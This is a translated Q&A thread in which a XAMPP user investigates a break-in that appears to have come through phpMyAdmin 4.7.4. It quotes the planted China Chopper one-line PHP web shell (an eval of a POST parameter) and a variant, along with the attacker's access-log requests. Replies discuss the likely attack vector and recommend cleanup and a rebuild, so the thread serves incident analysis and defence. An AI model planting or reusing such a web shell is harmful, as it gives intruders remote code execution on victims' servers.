与 XAMPP 捆绑在一起的 phpmyadmin 4.7.4 的安全问题 [关闭]

Posted 2023-02-25

【中文标题】与 XAMPP 捆绑在一起的 phpmyadmin 4.7.4 的安全问题 [关闭]

【英文标题】：Security issue with phpmyadmin 4.7.4 bundled with XAMPP [closed]

【发布时间】：2018-07-04 09:08:36

【问题描述】：

好的，所以我相信我遇到了最新版本的 XAMPP (php 7.2.1) 的安全问题，其中包括 phpmyadmin 4.7.4

我在我的 htdocs 文件夹 wuwu11.php 中发现了一个文件，其中包含如下 1 行

<?php @eval($_POST[h])?>

我查看了我的访问日志，发现以下内容

27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin/ HTTP/1.1" 200 13732 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:58 -0600] "POST /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13191 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:04:59 -0600] "GET /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13640 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:00 -0600] "GET /phpinfo.php HTTP/1.1" 401 1299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:01 -0600] "GET /index.php HTTP/1.1" 401 1297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /dashboard/phpinfo.php HTTP/1.1" 401 1309 "-" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /u.php?act=phpinfo HTTP/1.1" 401 1293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:03 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 368 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:05 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 9663 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:06 -0600] "POST /phpmyadmin/export.php HTTP/1.1" 500 888 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:07 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 10223 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:08 -0600] "GET /wuwu11.php HTTP/1.1" 401 1298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"

最后一行以似乎通过 phpmyadmin/import.php 上传的 php 文件结尾

在我的研究中，我发现这与 China Chopper Hacking Kit 有关 这些访问日志中的IP映射到中国、福建、福州

Found <?php @eval($_POST['pass']);?> code in wordpress site

幸运的是，我将根目录设置为 xampp 中默认 htdocs 文件夹以外的其他目录，否则我猜攻击者将能够执行代码、造成一些损害然后自行删除

想知道是否有人看到了这一点或有任何更多的见解，好像我是正确的并且攻击者正在利用 phpmyadmin

【参考方案1】：

为了全面起见，我认为重要的是要指出，如果您对任何软件程序有可疑的安全问题，responsible 要做的事情就是直接私下向公司或团队报告维护软件。在这种情况下，phpMyAdmin 团队有一个web page about how to submit security concerns through email。

接下来，phpMyAdmin 在他们的security page 上发布了他们的安全公告，我没有看到任何允许上传任意文件的内容，尤其是没有任何影响您的版本的相关内容。我认为 phpMyAdmin 不太可能是这里的攻击媒介。有趣的是，攻击者试图向导入和导出页面提交数据，但无论是否成功登录，都会记录状态码 200，因此我们无法从这部分日志中判断它们是否成功可以在这里做任何事情。与发布令牌的登录请求相同；如果它不是一个有效的令牌，那么登录尝试将被拒绝，并且 HTTP 状态代码是 200 无论如何。他们还尝试了其他几个文件，包括 u.php 和一个名为“dashboard”的子目录，这似乎是在尝试利用几个可能的漏洞中的任何一个。

根据发布的信息，我们无法判断攻击者使用什么向量来上传初始文件。但是，您已受到攻击，需要清理、保护攻击向量并重建。我建议完全重建，因为你不知道他们还能妥协什么。

【讨论】：

文件wuwu11.php文件的时间戳和请求它的时间是同时的，我也注意到我删除它后，它在第二天的同一时间又出现了，然后在我删除 phpmyadmin 后，该文件再也没有出现过。